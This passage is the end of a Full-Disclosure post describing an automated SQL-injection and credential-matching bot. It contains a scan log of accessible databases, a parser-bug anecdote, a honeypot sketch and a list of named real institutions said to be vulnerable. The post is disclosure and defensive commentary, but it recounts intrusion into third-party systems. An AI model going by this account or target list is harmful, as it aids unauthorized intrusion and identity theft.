20091128125635 [ VLNCONN ] DB #034: jackson
20091128125635 [ VLNCONN ]          Accessible
20091128125636 [ VLNCONN ] DB #035: Michelin
20091128125639 [ VLNCONN ]          Accessible
20091128125640 [ VLNCONN ] DB #036: dbMcAfee
20091128125640 [ VLNCONN ]          Accessible
20091128125641 [ VLNCONN ] DB #037: PMG_VA
20091128125641 [ VLNCONN ]          Accessible
20091128125641 [ VLNCONN ] DB #038: MCSoptimizer
20091128125642 [ VLNCONN ]          Accessible
20091128125642 [ VLNCONN ] DB #039: Maxtor
20091128125643 [ VLNCONN ]          Accessible
20091128125644 [ VLNCONN ] DB #040: Xtentia
20091128125645 [ VLNCONN ]          Accessible
20091128125645 [ VLNCONN ] DB #041: NokiaLetsNetwork
20091128125646 [ VLNCONN ]          Accessible
20091128125646 [ VLNCONN ] DB #042: Print_Optimizer
20091128125646 [ VLNCONN ]          Accessible
20091128125647 [ VLNCONN ] DB #043: GiftShop
20091128125647 [ VLNCONN ]          Accessible
20091128125648 [ VLNCONN ] DB #044: GiftShop_en
20091128125648 [ VLNCONN ]          Accessible
20091128125648 [ VLNCONN ] DB #045: dbOrderingTool
20091128125649 [ VLNCONN ]          Accessible
20091128125649 [ VLNCONN ] DB #046: SingHealth
20091128125650 [ VLNCONN ]          Accessible
20091128125650 [ VLNCONN ] DB #047: Watson_Wyatt
20091128125651 [ VLNCONN ]          Accessible
20091128125651 [ VLNCONN ] DB #048: VATest
20091128125652 [ VLNCONN ]          Accessible
20091128125652 [ VLNCONN ] DB #049: seagate_sdvr
20091128125653 [ VLNCONN ]          Accessible
20091128125653 [ VLNCONN ] DB #050: HM
20091128125653 [ VLNCONN ]          Accessible
20091128125654 [ VLNCONN ] DB #051: dbVirtualAgency
20091128125654 [ VLNCONN ]          Accessible
20091128125655 [ VLNCONN ] DB #052: Seagate_Xmas
20091128125655 [ VLNCONN ]          Accessible
20091128125657 [ VLNCONN ] DB #053: Seagate_CNY
20091128125657 [ VLNCONN ]          Accessible
20091128125658 [ VLNCONN ] DB #054: SeagateCM2
20091128125658 [ VLNCONN ]          Accessible
20091128125658 [ VLNCONN ] DB #055: SeagateSecuTecheInvite
20091128125659 [ VLNCONN ]          Accessible
20091128125659 [ VLNCONN ] DB #056: ICG
20091128125700 [ VLNCONN ]          Accessible
20091128125700 [ VLNCONN ] DB #057: SeagateCM2_China
20091128125701 [ VLNCONN ]          Accessible
20091128125701 [ VLNCONN ] DB #058: IntelServerConfig
20091128125702 [ VLNCONN ]          Accessible
20091128125702 [ VLNCONN ] DB #059: SeagateCM2_Korea
20091128125703 [ VLNCONN ]          Accessible
20091128125704 [ VLNCONN ] DB #060: IntelServerConfigTest
20091128125704 [ VLNCONN ]          Accessible
20091128125705 [ VLNCONN ] DB #061: SeagateCM2_Taiwan
20091128125705 [ VLNCONN ]          Accessible
20091128125706 [ VLNCONN ] DB #062: SeagateCMS
20091128125706 [ VLNCONN ]          Accessible
20091128125707 [ VLNCONN ] DB #063: dbNSNCafe
20091128125707 [ VLNCONN ]          Accessible
20091128125707 [ VLNCONN ] DB #064: SCMS_XDB
20091128125708 [ VLNCONN ]          Accessible
20091128125708 [ VLNCONN ] DB #065: SCMS_AU
20091128125709 [ VLNCONN ]          Accessible
20091128125710 [ VLNCONN ] Scan done -> 66 total DBs found
20091128125710 [ VLNCONN ]              59 accessible DBs found
20091128125710 [ SEG2 ] Vuln Connection Done.


Well...
Uhmmm....
Ok.

What the F**K is going on...

Bringing back FF, manually locating the 2nd entrypoint specified in the 
Bot's logs and ... it seems to be the "Forgotten Password" interface - the 
very same FORM the code penetrated the system through before. Manual 
injection -> not a single MSSQL error. Maybe it's hidden in some text area 
or in the background color - anything I could have missed.
Nope.
The HTML source is clean. Not a single ASP db-error string.

Now, this is the moment I guess a programmer lives for :)
To feel weak and stupid in front of the code you have just written.
It seems that, after all, one can learn new tricks from his own code. After 
a quick debugging session, watching the code run through the vulnerability 
matching steps, the case was solved.

The reason the code could successfully penetrate the system while I couldn't 
was a bug in the Bot (oh yeah...) that I left in while coding its HTML 
parser. The parser implementation, adopted from one of my previous projects 
(the Ogame robot), did not properly skip HTML code inside comment/escape 
sequences. Actually, that rule was coded in, but a minor true/false logic 
bug prevented it from ever executing.
The vulnerable "forgotten password" FORM was indeed vulnerable. Just not the 
one rendered by the browser.
The one tracked and targeted by the code was also a "forgotten password" 
interface, but it had a different 'action' URL-path parameter in the FORM 
tag and lay entirely within one of the HTML commented-out areas. It seems 
that some web programmer with a really sharp sense of humour patched the 
earlier vulnerable interface, gave it a new 'action' param path leading to a 
new, secure server-side interface, but not only didn't remove the old 
vulnerable interface from the server-side ASP code - he also left the old 
vulnerable FORM, pointing directly at that interface, merely commented out 
within the HTML.
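
A minimal sketch of that class of parser bug (nothing here is the Bot's 
actual code): a comment-blind extractor happily reports FORMs that a browser 
would never render.

# Naive vs. comment-aware FORM extraction over the same HTML.
import re

PAGE = """
<!-- old, forgotten interface, "patched" by commenting it out:
<form action="/old/forgot_pwd.asp" method="post">
  <input name="email">
</form>
-->
<form action="/new/forgot_pwd.asp" method="post">
  <input name="email">
</form>
"""

def forms_naive(html):
    # ignores comments entirely - this is the buggy behaviour
    return re.findall(r'<form[^>]*action="([^"]+)"', html, re.I)

def forms_comment_aware(html):
    # strip <!-- ... --> blocks first, then look for forms
    visible = re.sub(r'<!--.*?-->', '', html, flags=re.S)
    return re.findall(r'<form[^>]*action="([^"]+)"', visible, re.I)

print(forms_naive(PAGE))          # ['/old/forgot_pwd.asp', '/new/forgot_pwd.asp']
print(forms_comment_aware(PAGE))  # ['/new/forgot_pwd.asp']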

Anyway. A bug in the Bot's code helped the S2 penetration code find a 
completely different bug in the application.
You simply LIVE FOR these tiny, ironic moments.






20. SIDECAM Robots vs. Honeypots And Attack Vector Recognition
//////////////////////////////////////////////////////////////

Every time an attack vector evolves, one can design and implement a proper 
diversion/IDS facility - a honeypot.
Now, since I was focused in general on an ID theft attack scenario driven by 
SQL Injection based mailbox credential matching, one could construct a 
solution trained to recognize such an attack in progress, track its 
propagation and, with some luck, tell us something more about the remote 
entity that originated the attack and/or is actively exploiting the stolen 
data.
For a specialized SIDECAM-bot autodetection framework we would first need to 
spread the smell of honey far and wide, i.e. to be highly visible to 
automated google-driven target seekers.
Proper search engine positioning, combined with building in the most common 
SQL Injection entrypoint patterns (let's narrow it down to ASP for now) - 
like the infamous "login.asp" scheme, for example - plus a certain "data 
sensitivity flavour" to taste good (let's say something more critical than a 
sperm-bank customer database) - that should do the trick.
When attracted to our phony target, the attacker's S2-equivalent code should 
easily find the email/password record entries crafted and left there by us. 
These mail accounts, prepared specially for attack-IDing purposes, could 
then be robot-monitored by the honeypot framework - any valid login with 
those mailbox credentials will indicate SIDECAM attack vector exploitation 
in progress; a minimal sketch of such a monitor follows below.
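
The sketch below is illustrative only, assuming the honeypot operator also 
runs the mail server and can read its authentication log; the log path, log 
format and account names are all made up:

# Watch a mail server's auth log for successful logins to the honeytoken
# accounts that were seeded into the fake "customer" database. Any hit means
# the planted email/password pairs have been harvested and are being tried.
import time

HONEY_ACCOUNTS = {           # accounts that exist only inside the honeypot DB
    "j.doe@honeypot.example",
    "a.smith@honeypot.example",
}
AUTH_LOG = "/var/log/mail-auth.log"   # hypothetical path

def alert(account, line):
    # a real framework would notify the operator / correlate source IPs
    print("[SIDECAM-HONEYPOT] credential reuse detected for", account)
    print("  ", line.strip())

def watch(log_path):
    with open(log_path, "r") as f:
        f.seek(0, 2)                  # start at end of file, like `tail -f`
        while True:
            line = f.readline()
            if not line:
                time.sleep(1.0)
                continue
            for account in HONEY_ACCOUNTS:
                if account in line and "auth ok" in line.lower():
                    alert(account, line)

if __name__ == "__main__":
    watch(AUTH_LOG)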





21. Compromised
///////////////

The list below contains a selection of the most critical vulnerable 
institutions' systems, without details, identified by the Bot during the 
whole research; in some cases a single system opened penetration paths to 
several different organizations' / companies' systems.
Some of them might have been patched since the initial vulnerability match, 
some might have been shut down.
For the reasons mentioned in the first paragraph, neither links nor any 
further details will be disclosed publicly.


Vulnerable educational organization systems:

- University of South Carolina, (multiple entrypoints)
- Bulgarian Svishtov Economic University,
- Cracow Jagiellonian University, medical sciences department system
- California State University, student health web service
- University of Washington,
- University of Minnesota,
- Truman State University, (multiple entrypoints)
- Hunter College,
- Dallas Baptist University, graduate admissions system
- University of Arkansas for Medical Sciences
- Association for Information Systems database


Vulnerable government institution systems:

- Argentina Ministry of Foreign Affairs system,
- UK Vehicle Certification Agency system,
- UK Vehicle & Operator Services Agency system,
- Arizona Department of Transportation system,
- California Department of General Services, Online Fiscal Services system
- California Department of Education system,
- California Tax Education Council system,
- California Department of Justice (3 separate systems)
- Florida Department of Financial services system
- Colorado Department of Personnel and Administration system
- Maryland Information Technology Advisory Council system,
- District of Columbia Public Service Commission (multiple penetration 
entrypoints)
- Arizona Information Technology Agency system,
- U.S. Department of Transportation maritime service system,
- Texas Department of Justice system,
- Federal Mediation & Conciliation Service,
- Alberta (Canada) Advanced Education and Technology service,
- Georgia gov-job portal database,
- Georgia Financing and Investment Commission system,
- City of Grove City (Ohio), contractor application database,
- Geary County (Kansas) Gov Taxing web service,
- Sarpy County (Nebraska),
- Sawyer County, electronic taxing / land administration web system,
- Fauquier County (Virginia), county's government eNotification system,
- San Bernardino County web system, Purchasing Department Administration 
system,


Vulnerable US Department of Defense systems (including contractors and 
subcontractors):

- Rock Island Arsenal U.S. Army database system,
- U.S. National Defense University system,
- Jacobs Dougway (DoD and NASA contractor) performance and reporting system,
- DoD Severely Injured Service Member system,
- DoD Health Services Evaluation system,
- DoD troops civil career database ("Troops To Teach"),
- Lockheed Martin, (multiple entrypoints),
- U.S. Defense Logistics Agency system - defense fuel energy services 
system,


Vulnerable Financial institution systems:

- International Monetary Fund system
- U.S. National Association of Corporate Directors system,
- American Economic Association system,
- Global Banking "employer only" job board web system,
- Employee Stock Ownership Plan database,
- Mortgage Bankers Assoc of New York system,
- American Society for Training & Development system,
- International Fund Research Corporation database,
- numerous financial advisory companies and institutions


Vulnerable security companies and organizations:

- US based international security / law enforcement / private investigation 
company
- Private Investigators Portals database,
- Private detective, crime, security and software community portal database,
- Retired military officers job portal, entrypoint gives R/W access to other 
800+ databases,
- Associated Security Professionals (ASP) system


Vulnerable aviation and space systems:

- German Aerospace Center subsystem,
- International aerospace company providing equipment and airline 
information services,
- Canadian airline ticket centre system,
- Air Traffic Control Global Events, air traffic security conferences 
database system


Vulnerable health organizations systems:

- US Department Of Health, Disaster (hurricane) response online service,
- US Department of Health and Human Services University, learning platform 
participant database,
- US Centers for Disease Control and Prevention (CDC),
- National Association of Clean Water Agencies / Water Environment Research 
Foundation joint venture,
- International company providing validation services for pharmaceutical, 
biotechnology and medical device industries,
- US Nationwide Drug Testing Services Company,
- French Association of Anti-Age and Aesthetic Medicine,
- International health recruitment database,
- Cleveland Clinic Center for Continuing Education,


Miscellaneous vulnerable systems:

- 160 million hits per month global basketball portal for player promotion 
and exposure,
- A Polish commercial email/web hosting company's database,
- Rediff Portal system's database,
- an online-casino client account database,
- Computershare governance services,
- National Geographic's expeditions alliance company,
- An advertising network database system, serving 9 Billion ads on 1500+ web 
sites per month,
- Fuji client eSupport database,
- Dialogic corporation (IP, wireless and video solutions) client support 
database,
- Nestle corporation's database, Employee Benefit & learning subsystem,
- Australian business electronic messaging (SMS/MMS) provider,
- Event organizing and publishing company with 60+ yrs experience,
- Brazilian VoIP provider, client account database,
- International casting resource database for professional actors,

- a few web hosting companies, including small and large business clients,
- numerous dating portals, including one major dating web engine,
- recruitment companies and job portal client databases (29 systems), 
including IT, health, law-enforcement and ex-military.




22. return -1
/////////////

I think there is no doubt that the process of searching for a victim, 
seeking out vulnerable systems containing credit card numbers along with 
their CVV2 codes, matching further system penetration entrypoints - even the 
whole process of intrusion and subsequent system penetration - can be 
parametrized, mathematically described and finally automated using two 
things: a programming language and a machine. I guess everybody's familiar 
with the phrase "the word is stronger than the sword", right? Well, I must 
say that sometimes I like to feel that a DWORD is twice as strong :)

Although various "friendly" robot codes exist out there, helping us round 
the clock - like, for example, the HTTP web crawlers that build google's 
search index - there are also the bad guys. Obviously, the very same 
automation is being actively exploited by criminals to track down the 
vulnerable faster and to exploit them quicker.

There is one more important thing to note about the whole project. As 
probably everyone has already noticed :) the Bot code DOES NOT implement any 
miraculous, new, 0day attack vector "discovery" - it's just a PLAIN 
combination of a few human and software vulnerabilities which are probably 
as old as the internet itself (password reuse, email credential matching, 
script engine code injection). There are HUNDREDS of more advanced and more 
sophisticated automated and semi-automated tools and scripts, each of which 
probably does its job better than any single Bot part (segment) taken alone. 
The main target of this research was, however, FULL automation, i.e. binding 
all the "penetration phases" together and limiting as much as possible the 
human factor in the seek-probe-penetrate-analyse sequence.

In my opinion, the most disturbing observation of the research is that these 
results can be accomplished easily by anyone out there who is just bored 
enough - sitting at home, after or in between a daylight job, and without a 
budget. The question is: what are the capabilities of a potential criminal 
entity WITH a budget, unlimited research manpower and malicious goals? It 
would be really shortsighted to claim that fully automated codes of this 
kind - employing a several times wider range of protocols and targeting 
different server-side compromise technologies - haven't been operational for 
a long time already, under the control of the darker shades of the 
underground.

Nevertheless, it's pretty obvious: one cannot implement PERFECT protection 
for our personal secret data - we ourselves are the ultimate holders and 
protectors of those secrets - so all we can do is EDUCATE: how to build them 
strong and how to handle them safely. Still, I guess it would be nice to see 
some movement around automated and semi-automated robot code projects 
implemented and operated by white hats this time, ACTIVELY targeting the 
places that seriously weaken the global information infrastructure and leave 
users' personal ID information open to theft.

I mean, banks are obliged to protect their customers' money by following 
specific protocols which are developed and validated externally through 
appropriate audit procedures, right?
Is it then so hard to imagine an automated or semi-automated system, working 
more or less like a country-wide cyber security sonar, able to pinpoint and 
instantly alert the appropriate response/tech-support organizations about 
those specific "identity data bank" web applications and systems which CAN'T 
and WON'T protect our sensitive secrets - passwords, keys, CC data and IDs?
And all because of a single programmer's flaw which, exploited by an 
attacker, compromises our electronic security instantly.

Anyway, theory is one thing, reality is another...



Thx and Greetz: SIN, Sl4uGh7eR, Vo0, Andrui, Mario, Rothrin.

By porkythepig.
porkythepig@...t.pl

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
